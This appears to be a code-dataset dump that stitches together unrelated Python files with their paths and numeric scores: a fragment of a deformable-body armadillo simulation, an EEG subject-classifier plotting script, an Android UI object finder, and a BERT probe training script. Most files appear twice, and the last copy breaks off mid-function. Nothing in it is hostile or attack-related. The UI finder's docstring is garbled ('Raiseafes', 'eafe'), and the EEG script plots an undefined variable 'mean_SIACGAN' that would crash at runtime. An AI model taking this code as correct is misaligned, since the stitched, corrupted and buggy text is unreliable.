min_z = min_corner[2]
max_z = max_corner[2]
min_x = min_corner[0]
max_x = max_corner[0]
dirichlet_dofs = []
self.__min_x_nodes = []
self.__max_x_nodes = []
for i in range(vert_num):
vx, vy, vz = all_verts[i]
if vx - min_x < 1e-3:
self.__min_x_nodes.append(i)
if max_x - vx < 1e-3:
self.__max_x_nodes.append(i)
if vz - min_z < 1e-3:
deformable.SetDirichletBoundaryCondition(3 * i, vx)
deformable.SetDirichletBoundaryCondition(3 * i + 1, vy)
deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
dirichlet_dofs += [3 * i, 3 * i + 1, 3 * i + 2]
if max_z - vz < 1e-3:
deformable.SetDirichletBoundaryCondition(3 * i + 2, vz)
dirichlet_dofs += [3 * i + 2,]
self.__dirichlet_dofs = dirichlet_dofs
# State-based forces.
deformable.AddStateForce('gravity', state_force_parameters)
# Initial state by rotating the armadillo.
q0 = np.copy(all_verts)
theta = float(options['init_rotate_angle'])
for i in range(vert_num):
vi = all_verts[i]
th = (vi[2] - min_z) / (max_corner[2] - min_z) * theta
c, s = np.cos(th), np.sin(th)
R = ndarray([[c, -s, 0],
[s, c, 0],
[0, 0, 1]])
q0[i] = R @ (vi - center) + center
dofs = deformable.dofs()
act_dofs = deformable.act_dofs()
q0 = q0.ravel()
v0 = ndarray(np.zeros(dofs)).ravel()
f_ext = ndarray(np.zeros(dofs)).ravel()
# Data members.
self._deformable = deformable
self._q0 = q0
self._v0 = v0
self._f_ext = f_ext
self._youngs_modulus = youngs_modulus
self._poissons_ratio = poissons_ratio
self._state_force_parameters = state_force_parameters
self._stepwise_loss = False
self.__loss_q_grad = np.random.normal(size=dofs)
self.__loss_v_grad = np.random.normal(size=dofs)
self.__spp = options['spp'] if 'spp' in options else 4
def material_stiffness_differential(self, youngs_modulus, poissons_ratio):
# This (0, 2) shape is due to the usage of Neohookean materials.
return np.zeros((0, 2))
def is_dirichlet_dof(self, dof):
return dof in self.__dirichlet_dofs
def _display_mesh(self, mesh_file, file_name):
# Size of the bounding box: [-0.06, -0.05, 0] - [0.06, 0.05, 0.14]
options = {
'file_name': file_name,
'light_map': 'uffizi-large.exr',
'sample': self.__spp,
'max_depth': 2,
'camera_pos': (0.12, -0.8, 0.34),
'camera_lookat': (0, 0, .15)
}
renderer = PbrtRenderer(options)
mesh = TetMesh3d()
mesh.Initialize(mesh_file)
vert_num = mesh.NumOfVertices()
all_verts = ndarray([ndarray(mesh.py_vertex(i)) for i in range(vert_num)])
renderer.add_tri_mesh(mesh, color='0096c7',
transforms=[('s', 2)],
render_tet_edge=True,
)
renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',
texture_img='chkbd_24_0.7', transforms=[('s', 2)])
renderer.render()
def min_x_nodes(self):
return self.__min_x_nodes
def max_x_nodes(self):
return self.__max_x_nodes
def _loss_and_grad(self, q, v):
loss = q.dot(self.__loss_q_grad) + v.dot(self.__loss_v_grad)
return loss, np.copy(self.__loss_q_grad), np.copy(self.__loss_v_grad) | 0.549157 | 0.26636 |
import numpy as np
import torch
import torch.nn as nn
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import Data_prep_12
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# Hyper Parameters
num_epochs = 1
learning_rate = 0.00001
dropout_level = 0.0
wdecay = 0.04
batch_size = 5
num_subjects = 9
class EEG_CNN_Subject(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv1d(in_channels=2, out_channels=16, kernel_size=20, stride=4, bias=False),
nn.BatchNorm1d(num_features=16),
nn.PReLU(),
nn.Dropout(0.0))
self.layer2 = nn.Sequential(
nn.Conv1d(in_channels=16, out_channels=32, kernel_size=10, stride=2, bias=False),
nn.BatchNorm1d(num_features=32),
nn.PReLU(),
nn.Dropout(0.0))
self.layer3 = nn.Sequential(
nn.Conv1d(in_channels=32, out_channels=64, kernel_size=5, stride=2, bias=False),
nn.BatchNorm1d(num_features=64),
nn.PReLU(),
nn.Dropout(0.0))
self.layer4 = nn.Sequential(
nn.Conv1d(in_channels=64, out_channels=128, kernel_size=3, stride=2, bias=False),
nn.BatchNorm1d(num_features=128),
nn.PReLU(),
nn.Dropout(0.0))
self.layer5 = nn.Sequential(
nn.Conv1d(in_channels=128, out_channels=256, kernel_size=2, stride=4, bias=False),
nn.BatchNorm1d(num_features=256),
nn.PReLU(),
nn.Dropout(0.0))
self.classifier = nn.Linear(2816, num_subjects)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = self.layer5(out)
out = out.view(out.size(0), -1)
out = self.classifier(out)
return out
subject_predictor = EEG_CNN_Subject().to(device)
state = torch.load("pretrain_subject.cpt")
subject_predictor.load_state_dict(state['state_dict'])
def sub_invariant(data_fake, label_fake):
train_input = torch.from_numpy(data_fake)
train_label = torch.from_numpy(label_fake)
# create the data loader for the training set
trainset = torch.utils.data.TensorDataset(train_input, train_label)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=False, num_workers=4)
mean_outputs = []
subject_predictor.eval()
with torch.no_grad():
for i, data in enumerate(trainloader, 0):
# format the data from the dataloader
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
inputs = inputs.float()
outputs = subject_predictor(inputs)
outputs = torch.softmax(outputs, dim=1)
outputs = outputs.detach().cpu().numpy()
mean_outputs.append(outputs)
mean_outputs = np.asarray(mean_outputs)
mean_outputs = np.concatenate(mean_outputs)
mean_outputs = np.mean(mean_outputs, 0)
return mean_outputs
data_SISGAN = np.load('SISGAN_CT.npy')
label_SISGAN = np.load('SISGAN_CT_labels.npy')
label_SISGAN = label_SISGAN.astype(np.int64)
data_ACGAN = np.load('ACGAN_CT.npy')
label_ACGAN = np.load('ACGAN_CT_labels.npy')
label_ACGAN = label_ACGAN.astype(np.int64)
mean_SISGAN = sub_invariant(data_SISGAN, label_SISGAN)
mean_ACGAN = sub_invariant(data_ACGAN, label_ACGAN)
X = np.arange(9)
plt.bar(X + 0.05, mean_ACGAN, color='tab:blue', width = 0.4)
plt.bar(X + 0.45, mean_SIACGAN, color='tab:green', width = 0.4)
plt.rc('xtick',labelsize=14)
plt.rc('ytick',labelsize=14)
plt.xlabel('Subject' , fontsize=15)
plt.ylabel('Probability', fontsize=15)
plt.xticks(X + 0.50 / 2, ('S01', 'S02', 'S03', 'S04', 'S05', 'S06', 'S07', 'S08', 'S09'))
plt.legend(handles = [mpatches.Patch(color='tab:blue', label='AC-GAN'), mpatches.Patch(color='tab:green', label='SIS-GAN')], fontsize=15)
plt.savefig('softmax.pdf') | src/CNN_Subject_softmax.py | import numpy as np
import torch
import torch.nn as nn
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import Data_prep_12
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# Hyper Parameters
num_epochs = 1
learning_rate = 0.00001
dropout_level = 0.0
wdecay = 0.04
batch_size = 5
num_subjects = 9
class EEG_CNN_Subject(nn.Module):
def __init__(self):
super().__init__()
self.layer1 = nn.Sequential(
nn.Conv1d(in_channels=2, out_channels=16, kernel_size=20, stride=4, bias=False),
nn.BatchNorm1d(num_features=16),
nn.PReLU(),
nn.Dropout(0.0))
self.layer2 = nn.Sequential(
nn.Conv1d(in_channels=16, out_channels=32, kernel_size=10, stride=2, bias=False),
nn.BatchNorm1d(num_features=32),
nn.PReLU(),
nn.Dropout(0.0))
self.layer3 = nn.Sequential(
nn.Conv1d(in_channels=32, out_channels=64, kernel_size=5, stride=2, bias=False),
nn.BatchNorm1d(num_features=64),
nn.PReLU(),
nn.Dropout(0.0))
self.layer4 = nn.Sequential(
nn.Conv1d(in_channels=64, out_channels=128, kernel_size=3, stride=2, bias=False),
nn.BatchNorm1d(num_features=128),
nn.PReLU(),
nn.Dropout(0.0))
self.layer5 = nn.Sequential(
nn.Conv1d(in_channels=128, out_channels=256, kernel_size=2, stride=4, bias=False),
nn.BatchNorm1d(num_features=256),
nn.PReLU(),
nn.Dropout(0.0))
self.classifier = nn.Linear(2816, num_subjects)
def forward(self, x):
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = self.layer5(out)
out = out.view(out.size(0), -1)
out = self.classifier(out)
return out
subject_predictor = EEG_CNN_Subject().to(device)
state = torch.load("pretrain_subject.cpt")
subject_predictor.load_state_dict(state['state_dict'])
def sub_invariant(data_fake, label_fake):
train_input = torch.from_numpy(data_fake)
train_label = torch.from_numpy(label_fake)
# create the data loader for the training set
trainset = torch.utils.data.TensorDataset(train_input, train_label)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=False, num_workers=4)
mean_outputs = []
subject_predictor.eval()
with torch.no_grad():
for i, data in enumerate(trainloader, 0):
# format the data from the dataloader
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
inputs = inputs.float()
outputs = subject_predictor(inputs)
outputs = torch.softmax(outputs, dim=1)
outputs = outputs.detach().cpu().numpy()
mean_outputs.append(outputs)
mean_outputs = np.asarray(mean_outputs)
mean_outputs = np.concatenate(mean_outputs)
mean_outputs = np.mean(mean_outputs, 0)
return mean_outputs
data_SISGAN = np.load('SISGAN_CT.npy')
label_SISGAN = np.load('SISGAN_CT_labels.npy')
label_SISGAN = label_SISGAN.astype(np.int64)
data_ACGAN = np.load('ACGAN_CT.npy')
label_ACGAN = np.load('ACGAN_CT_labels.npy')
label_ACGAN = label_ACGAN.astype(np.int64)
mean_SISGAN = sub_invariant(data_SISGAN, label_SISGAN)
mean_ACGAN = sub_invariant(data_ACGAN, label_ACGAN)
X = np.arange(9)
plt.bar(X + 0.05, mean_ACGAN, color='tab:blue', width = 0.4)
plt.bar(X + 0.45, mean_SIACGAN, color='tab:green', width = 0.4)
plt.rc('xtick',labelsize=14)
plt.rc('ytick',labelsize=14)
plt.xlabel('Subject' , fontsize=15)
plt.ylabel('Probability', fontsize=15)
plt.xticks(X + 0.50 / 2, ('S01', 'S02', 'S03', 'S04', 'S05', 'S06', 'S07', 'S08', 'S09'))
plt.legend(handles = [mpatches.Patch(color='tab:blue', label='AC-GAN'), mpatches.Patch(color='tab:green', label='SIS-GAN')], fontsize=15)
plt.savefig('softmax.pdf') | 0.919611 | 0.487429 |
from __future__ import unicode_literals
import math
import sys
from phoneauto.scriptgenerator.exception import UiObjectNotFound
class UiObjectLocator(object):
"""Locator for locating a UI object on the screen"""
def __init__(self, filters, index=None):
"""Initialize locator object
Args:
filters (dict): Key-value pairs which are used as filter conditions
to filter out UI Objects.
index (int): Index in a list which is yielded by applying
filters. It is used to identify the UI object.
When filters are enough to filter out UI objects to one single
object, index is not used and can be None.
"""
self._filters = filters
self._index = index
self._meta = None
def set_meta(self, meta):
"""Set meta information"""
self._meta = meta
@property
def meta(self):
"""Meta information aquired on search"""
return self._meta
@property
def filters(self):
"""Filter conditions which is used to identify a UI object"""
return self._filters
@property
def index(self):
"""Index in filter results, which is used to identify a UI object"""
return self._index
class UiObjectFinder(object):
"""Finder to spot a UI object for provided conditions"""
_FIND_OBJECT_DISTANCE_THRESH = 200
def __init__(self, hierarchy_dump):
"""Initialize finder object
Args:
hierarchy_dump (object): UI hierarchy dump object
"""
self._hierarchy_dump = hierarchy_dump
def find_object_contains(self, coord, ignore_distant, **criteria):
"""Find an object of which rect contains given coordinates
and meeds given criteria.
Args:
coord (tuple): Coordinates (x, y)
ignore_distant (bool):
Boolean flag which specifies whether it ignores
UI objects of which center are too far from coord.
criteria (dict):
Optional key-value pairs which filter search result
Returns:
locator object
Raiseafes:
eafe UiObjectNotFound: If there is no such object corresponds to
f given coordinates and criteria.
"""
# Find all objects which contain (x, y)
objects_iter = self._find_objects_contains(
coord, ignore_distant, **criteria)
# Pick an object which has smallest area
smallest = self._select_smallest_object(objects_iter)
if smallest is None:
raise UiObjectNotFound('({0}, {1})'.format(*coord))
# Try finding filters which can uniquely identify an object
locator = self._determine_locator(smallest['object'])
# If failed, Use index in addition to filters
locator = locator or UiObjectLocator(
filters=criteria, index=smallest['index'])
locator.set_meta(smallest['object'])
return locator
def _find_objects_contains(self, coord, ignore_distant, **criteria):
"""Find UI object of which rect contains coord"""
# pylint: disable=invalid-name
T, L, B, R = 'top', 'left', 'bottom', 'right'
x, y = coord
def xy_in_rect(r):
"""Check xy is in rect r"""
if x < r[L] or r[R] <= x or y < r[T] or r[B] <= y:
return False
if ignore_distant:
r_x, r_y = r[L] + (r[R] - r[L]) / 2, r[T] + (r[B] - r[T]) / 2
distance = math.hypot(x - r_x, y - r_y)
return distance < self._FIND_OBJECT_DISTANCE_THRESH
return True
objects = self._hierarchy_dump.find_objects(**criteria)
for i, obj in enumerate(objects):
if xy_in_rect(obj['visibleBounds']):
yield (i, obj)
@staticmethod
def _select_smallest_object(object_enum):
"""Select the smallest UI object from a set of UI objects"""
def rect_area(rect):
"""Returns area of rect"""
return ((rect['bottom'] - rect['top']) *
(rect['right'] - rect['left']))
min_obj = sentinel = (sys.maxsize, )
for i, obj in object_enum:
area = rect_area(obj['visibleBounds'])
if area < min_obj[0]:
min_obj = (area, i, obj)
if min_obj is sentinel:
return None
return {'index': min_obj[1], 'object': min_obj[2]}
def _determine_locator(self, info):
"""Determine locator which identifies one single UI object"""
def unique(**criteria):
"""Check if given criteria finds single UI object"""
objects = list(self._hierarchy_dump.find_objects(**criteria))
return len(objects) == 1
# uses resource_id if it's available and unique
resource_id = info['resourceName']
if resource_id and unique(resourceId=resource_id):
return UiObjectLocator(filters={'resourceId': resource_id})
# uses content-desc if it's available
content_desc = info['contentDescription']
if content_desc and unique(description=content_desc):
return UiObjectLocator(filters={'description': content_desc})
# uses text if it's available
if info['text'] and unique(text=info['text']):
return UiObjectLocator(filters={'text': info['text']})
# uses text if it's available
class_name = info['className']
if class_name and unique(className=class_name):
return UiObjectLocator(filters={'className': class_name})
return None | phoneauto/scriptgenerator/uiobjectfinder.py | from __future__ import unicode_literals
import math
import sys
from phoneauto.scriptgenerator.exception import UiObjectNotFound
class UiObjectLocator(object):
"""Locator for locating a UI object on the screen"""
def __init__(self, filters, index=None):
"""Initialize locator object
Args:
filters (dict): Key-value pairs which are used as filter conditions
to filter out UI Objects.
index (int): Index in a list which is yielded by applying
filters. It is used to identify the UI object.
When filters are enough to filter out UI objects to one single
object, index is not used and can be None.
"""
self._filters = filters
self._index = index
self._meta = None
def set_meta(self, meta):
"""Set meta information"""
self._meta = meta
@property
def meta(self):
"""Meta information aquired on search"""
return self._meta
@property
def filters(self):
"""Filter conditions which is used to identify a UI object"""
return self._filters
@property
def index(self):
"""Index in filter results, which is used to identify a UI object"""
return self._index
class UiObjectFinder(object):
"""Finder to spot a UI object for provided conditions"""
_FIND_OBJECT_DISTANCE_THRESH = 200
def __init__(self, hierarchy_dump):
"""Initialize finder object
Args:
hierarchy_dump (object): UI hierarchy dump object
"""
self._hierarchy_dump = hierarchy_dump
def find_object_contains(self, coord, ignore_distant, **criteria):
"""Find an object of which rect contains given coordinates
and meeds given criteria.
Args:
coord (tuple): Coordinates (x, y)
ignore_distant (bool):
Boolean flag which specifies whether it ignores
UI objects of which center are too far from coord.
criteria (dict):
Optional key-value pairs which filter search result
Returns:
locator object
Raiseafes:
eafe UiObjectNotFound: If there is no such object corresponds to
f given coordinates and criteria.
"""
# Find all objects which contain (x, y)
objects_iter = self._find_objects_contains(
coord, ignore_distant, **criteria)
# Pick an object which has smallest area
smallest = self._select_smallest_object(objects_iter)
if smallest is None:
raise UiObjectNotFound('({0}, {1})'.format(*coord))
# Try finding filters which can uniquely identify an object
locator = self._determine_locator(smallest['object'])
# If failed, Use index in addition to filters
locator = locator or UiObjectLocator(
filters=criteria, index=smallest['index'])
locator.set_meta(smallest['object'])
return locator
def _find_objects_contains(self, coord, ignore_distant, **criteria):
"""Find UI object of which rect contains coord"""
# pylint: disable=invalid-name
T, L, B, R = 'top', 'left', 'bottom', 'right'
x, y = coord
def xy_in_rect(r):
"""Check xy is in rect r"""
if x < r[L] or r[R] <= x or y < r[T] or r[B] <= y:
return False
if ignore_distant:
r_x, r_y = r[L] + (r[R] - r[L]) / 2, r[T] + (r[B] - r[T]) / 2
distance = math.hypot(x - r_x, y - r_y)
return distance < self._FIND_OBJECT_DISTANCE_THRESH
return True
objects = self._hierarchy_dump.find_objects(**criteria)
for i, obj in enumerate(objects):
if xy_in_rect(obj['visibleBounds']):
yield (i, obj)
@staticmethod
def _select_smallest_object(object_enum):
"""Select the smallest UI object from a set of UI objects"""
def rect_area(rect):
"""Returns area of rect"""
return ((rect['bottom'] - rect['top']) *
(rect['right'] - rect['left']))
min_obj = sentinel = (sys.maxsize, )
for i, obj in object_enum:
area = rect_area(obj['visibleBounds'])
if area < min_obj[0]:
min_obj = (area, i, obj)
if min_obj is sentinel:
return None
return {'index': min_obj[1], 'object': min_obj[2]}
def _determine_locator(self, info):
"""Determine locator which identifies one single UI object"""
def unique(**criteria):
"""Check if given criteria finds single UI object"""
objects = list(self._hierarchy_dump.find_objects(**criteria))
return len(objects) == 1
# uses resource_id if it's available and unique
resource_id = info['resourceName']
if resource_id and unique(resourceId=resource_id):
return UiObjectLocator(filters={'resourceId': resource_id})
# uses content-desc if it's available
content_desc = info['contentDescription']
if content_desc and unique(description=content_desc):
return UiObjectLocator(filters={'description': content_desc})
# uses text if it's available
if info['text'] and unique(text=info['text']):
return UiObjectLocator(filters={'text': info['text']})
# uses text if it's available
class_name = info['className']
if class_name and unique(className=class_name):
return UiObjectLocator(filters={'className': class_name})
return None | 0.74826 | 0.383815 |
from pathlib import Path
import multiprocessing as mp
from torch.optim import Adam
from torch.optim.lr_scheduler import ReduceLROnPlateau
from tqdm import tqdm
from transformers import AutoTokenizer, BertForMaskedLM, BertForSequenceClassification, AutoConfig, BertModel
import torch
import torch.utils.data as tud
from .args import ArgumentParserBuilder, OptionEnum, opt
from vizbert.data import ConllTextCollator, TrainingWorkspace, ClassificationCollator, DATA_WORKSPACE_CLASSES, ZeroMeanTransform
from vizbert.inject import ModelInjector, BertHiddenLayerInjectionHook, ProbeReportingModule
from vizbert.model import ProjectionPursuitProbe, EntropyLoss, ModelTrainer, LOSS_KEY, LOSS_SIZE_KEY, MaskedConceptLoss,\
ReconstructionLoss
def train(args):
def entropy_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
loss = neg_entropy = criterion(scores)
if args.dual:
probe.inverse = not probe.inverse
recon_scores = model(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
probe.inverse = not probe.inverse
loss += recon_criterion(recon_scores.softmax(-1), gold_scores.softmax(-1)) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0),
'entropy': -neg_entropy}
def recon_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
loss = criterion(scores, gold_scores) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0)}
dw = DATA_WORKSPACE_CLASSES[args.dataset](args.data_folder)
train_ds, dev_ds, test_ds = dw.load_splits()
if args.dataset == 'conll':
model = BertForMaskedLM.from_pretrained(args.model).to(args.device)
model2 = BertForMaskedLM.from_pretrained(args.model).to(args.device)
else:
config = AutoConfig.from_pretrained(args.model)
config.num_labels = train_ds.num_labels
model = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
model2 = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
if args.load_weights:
model.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
model2.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
for rank in args.ranks:
probe = ProjectionPursuitProbe(args.num_features,
rank=rank,
optimize_mean=args.optimize_mean,
inverse=args.inverse).to(args.device)
recon_criterion = torch.nn.L1Loss()
hook = BertHiddenLayerInjectionHook(probe, args.layer_idx - 1)
injector = ModelInjector(model.bert, hooks=[hook])
workspace = TrainingWorkspace(Path(f'{args.workspace_prefix}-r{rank}'))
if args.load_probe:
sd = workspace.load_model(probe)
for _, param in zip((k for k in sd if k.startswith('probe_params')), probe.probe_params):
param.requires_grad = False
tok_config = {}
if 'bert' in args.model:
tok_config['do_basic_tokenize'] = args.basic_tokenize
tokenizer = AutoTokenizer.from_pretrained(args.model, **tok_config)
if args.objective == 'entropy':
criterion = EntropyLoss()
elif args.objective == 'concept':
criterion = MaskedConceptLoss(multilabel=dev_ds.multilabel,
weight=args.mask_weight,
inverse=args.inverse)
elif args.objective == 'recon':
criterion = ReconstructionLoss(multilabel=dev_ds.multilabel)
feeder = entropy_feeder if args.objective == 'entropy' else recon_feeder
if args.dataset == 'conll':
collator = ConllTextCollator(tokenizer)
else:
collator = ClassificationCollator(tokenizer, max_length=args.max_seq_len, multilabel=dev_ds.multilabel)
train_loader = tud.DataLoader(train_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
shuffle=True, num_workers=args.num_workers)
dev_loader = tud.DataLoader(dev_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
test_loader = tud.DataLoader(test_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
model.eval()
model2.eval()
if args.use_zmt:
zmt = ZeroMeanTransform(768, 2).to(args.device)
reporting_module = ProbeReportingModule()
t_hook = BertHiddenLayerInjectionHook(reporting_module, args.layer_idx - 1)
zmt_injector = ModelInjector(model.bert, hooks=[t_hook])
with zmt_injector:
for idx, batch in enumerate(
tqdm(train_loader, total=min(len(train_loader), args.zmt_limit), desc='Computing ZMT')):
model(batch.token_ids.to(args.device),
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))
zmt.update(reporting_module.buffer,
mask=batch.attention_mask.to(args.device).unsqueeze(-1).expand_as(reporting_module.buffer))
if idx == args.zmt_limit:
break
probe.zmt = zmt
optimizer = Adam(filter(lambda x: x.requires_grad, probe.parameters()), lr=args.lr)
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=0)
trainer = ModelTrainer((train_loader, dev_loader, test_loader),
probe,
workspace,
optimizer,
args.num_epochs,
feeder,
optimization_limit=args.opt_limit,
scheduler=scheduler)
if args.eval_only:
with injector:
trainer.evaluate(trainer.dev_loader, 'Dev')
trainer.evaluate(trainer.test_loader, 'Test')
else:
with injector:
trainer.train(test=args.dataset != 'sst2')
def main():
apb = ArgumentParserBuilder()
apb.add_opts(OptionEnum.DATA_FOLDER,
OptionEnum.LAYER_IDX,
OptionEnum.PROBE_RANK,
OptionEnum.MODEL,
OptionEnum.NUM_EPOCHS,
OptionEnum.NUM_WORKERS,
OptionEnum.DEVICE,
OptionEnum.BATCH_SIZE,
OptionEnum.LR,
OptionEnum.EVAL_ONLY,
OptionEnum.USE_ZMT,
OptionEnum.OPTIMIZE_MEAN,
OptionEnum.DATASET,
OptionEnum.MAX_SEQ_LEN,
OptionEnum.INVERSE,
opt('--workspace-prefix', type=str, required=True),
opt('--no-mask-first', action='store_false', dest='mask_first'),
opt('--opt-limit', type=int),
opt('--zmt-limit', type=int, default=1000),
opt('--load-probe', action='store_true'),
opt('--load-weights', type=Path),
opt('--ranks', nargs='+', type=int, default=(1, 2, 3, 6, 12, 24, 48, 96, 192, 384, 576)),
opt('--no-basic-tokenize', action='store_false', dest='basic_tokenize'),
opt('--num-features', type=int, default=768),
opt('--objective', type=str, default='concept', choices=['concept', 'entropy', 'recon']),
opt('--mask-classes', type=int, nargs='+', default=[]),
opt('--l1-penalty', type=float, default=0),
opt('--dual', action='store_true'),
opt('--mask-weight', type=float, default=1))
args = apb.parser.parse_args()
if args.probe_rank:
args.ranks = (args.probe_rank,)
if args.num_workers is None:
args.num_workers = mp.cpu_count()
train(args)
if __name__ == '__main__':
main() | vizbert/run/train_pp_probe.py | from pathlib import Path
import multiprocessing as mp
from torch.optim import Adam
from torch.optim.lr_scheduler import ReduceLROnPlateau
from tqdm import tqdm
from transformers import AutoTokenizer, BertForMaskedLM, BertForSequenceClassification, AutoConfig, BertModel
import torch
import torch.utils.data as tud
from .args import ArgumentParserBuilder, OptionEnum, opt
from vizbert.data import ConllTextCollator, TrainingWorkspace, ClassificationCollator, DATA_WORKSPACE_CLASSES, ZeroMeanTransform
from vizbert.inject import ModelInjector, BertHiddenLayerInjectionHook, ProbeReportingModule
from vizbert.model import ProjectionPursuitProbe, EntropyLoss, ModelTrainer, LOSS_KEY, LOSS_SIZE_KEY, MaskedConceptLoss,\
ReconstructionLoss
def train(args):
def entropy_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
loss = neg_entropy = criterion(scores)
if args.dual:
probe.inverse = not probe.inverse
recon_scores = model(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
probe.inverse = not probe.inverse
loss += recon_criterion(recon_scores.softmax(-1), gold_scores.softmax(-1)) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0),
'entropy': -neg_entropy}
def recon_feeder(_, batch):
token_ids = batch.token_ids.to(args.device)
scores = model(token_ids, attention_mask=batch.attention_mask.to(args.device))[0]
gold_scores = model2(token_ids,
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))[0]
loss = criterion(scores, gold_scores) # TODO: multilabel
model.zero_grad()
model2.zero_grad()
return {LOSS_KEY: loss,
LOSS_SIZE_KEY: token_ids.size(0)}
dw = DATA_WORKSPACE_CLASSES[args.dataset](args.data_folder)
train_ds, dev_ds, test_ds = dw.load_splits()
if args.dataset == 'conll':
model = BertForMaskedLM.from_pretrained(args.model).to(args.device)
model2 = BertForMaskedLM.from_pretrained(args.model).to(args.device)
else:
config = AutoConfig.from_pretrained(args.model)
config.num_labels = train_ds.num_labels
model = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
model2 = BertForSequenceClassification.from_pretrained(args.model, config=config).to(args.device)
if args.load_weights:
model.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
model2.load_state_dict(torch.load(str(args.load_weights / 'model.pt')))
for rank in args.ranks:
probe = ProjectionPursuitProbe(args.num_features,
rank=rank,
optimize_mean=args.optimize_mean,
inverse=args.inverse).to(args.device)
recon_criterion = torch.nn.L1Loss()
hook = BertHiddenLayerInjectionHook(probe, args.layer_idx - 1)
injector = ModelInjector(model.bert, hooks=[hook])
workspace = TrainingWorkspace(Path(f'{args.workspace_prefix}-r{rank}'))
if args.load_probe:
sd = workspace.load_model(probe)
for _, param in zip((k for k in sd if k.startswith('probe_params')), probe.probe_params):
param.requires_grad = False
tok_config = {}
if 'bert' in args.model:
tok_config['do_basic_tokenize'] = args.basic_tokenize
tokenizer = AutoTokenizer.from_pretrained(args.model, **tok_config)
if args.objective == 'entropy':
criterion = EntropyLoss()
elif args.objective == 'concept':
criterion = MaskedConceptLoss(multilabel=dev_ds.multilabel,
weight=args.mask_weight,
inverse=args.inverse)
elif args.objective == 'recon':
criterion = ReconstructionLoss(multilabel=dev_ds.multilabel)
feeder = entropy_feeder if args.objective == 'entropy' else recon_feeder
if args.dataset == 'conll':
collator = ConllTextCollator(tokenizer)
else:
collator = ClassificationCollator(tokenizer, max_length=args.max_seq_len, multilabel=dev_ds.multilabel)
train_loader = tud.DataLoader(train_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
shuffle=True, num_workers=args.num_workers)
dev_loader = tud.DataLoader(dev_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
test_loader = tud.DataLoader(test_ds, batch_size=args.batch_size, pin_memory=True, collate_fn=collator,
num_workers=args.num_workers)
model.eval()
model2.eval()
if args.use_zmt:
zmt = ZeroMeanTransform(768, 2).to(args.device)
reporting_module = ProbeReportingModule()
t_hook = BertHiddenLayerInjectionHook(reporting_module, args.layer_idx - 1)
zmt_injector = ModelInjector(model.bert, hooks=[t_hook])
with zmt_injector:
for idx, batch in enumerate(
tqdm(train_loader, total=min(len(train_loader), args.zmt_limit), desc='Computing ZMT')):
model(batch.token_ids.to(args.device),
attention_mask=batch.attention_mask.to(args.device),
token_type_ids=batch.segment_ids.to(args.device))
zmt.update(reporting_module.buffer,
mask=batch.attention_mask.to(args.device).unsqueeze(-1).expand_as(reporting_module.buffer))
if idx == args.zmt_limit:
break
probe.zmt = zmt
optimizer = Adam(filter(lambda x: x.requires_grad, probe.parameters()), lr=args.lr)
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=0)
trainer = ModelTrainer((train_loader, dev_loader, test_loader),
probe,
workspace,
optimizer,
args.num_epochs,
feeder,
optimization_limit=args.opt_limit,
scheduler=scheduler)
if args.eval_only:
with injector:
trainer.evaluate(trainer.dev_loader, 'Dev')
trainer.evaluate(trainer.test_loader, 'Test')
else:
with injector:
trainer.train(test=args.dataset != 'sst2')
def main():
apb = ArgumentParserBuilder()
apb.add_opts(OptionEnum.DATA_FOLDER,
